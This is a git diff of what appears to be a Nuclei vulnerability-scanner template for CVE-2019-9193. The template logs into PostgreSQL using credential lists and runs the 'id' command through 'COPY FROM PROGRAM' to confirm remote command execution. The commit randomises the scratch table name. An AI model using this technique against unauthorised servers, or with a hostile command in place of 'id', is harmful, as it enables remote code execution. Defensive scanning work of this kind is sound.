Update CVE-2019-9193.yaml
parent
fd578f313e
commit
ed3374d42e
|
@ -17,7 +17,8 @@ javascript:
|
|||
- code: |
|
||||
const postgres = require('nuclei/postgres');
|
||||
const client = new postgres.PGClient;
|
||||
const qry = ["CREATE TABLE cmd_exec(cmd_output text);", "COPY cmd_exec FROM PROGRAM 'id';", "SELECT * FROM cmd_exec;", "DROP TABLE IF EXISTS cmd_exec;",];
|
||||
const tbl = tbl_exec
|
||||
const qry = ["CREATE TABLE "+tbl+"(cmd_output text);", "COPY "+tbl + " FROM PROGRAM 'id';", "SELECT * FROM "+ tbl+";", "DROP TABLE IF EXISTS " +tbl+";",];
|
||||
for (const x of qry){
|
||||
connected = client.ExecuteQuery(Host, Port, User, Pass, Db, x);
|
||||
Export(connected);
|
||||
|
@ -29,6 +30,7 @@ javascript:
|
|||
User: "{{usernames}}"
|
||||
Pass: "{{password}}"
|
||||
Db: "{{database}}"
|
||||
tbl_exec: "{{randbase(5)}}"
|
||||
|
||||
payloads:
|
||||
usernames:
|
||||
|
@ -48,4 +50,4 @@ javascript:
|
|||
|
||||
- type: word
|
||||
words:
|
||||
- "cmd_output"
|
||||
- "cmd_output"
|
||||
|
|
Loading…
Reference in New Issue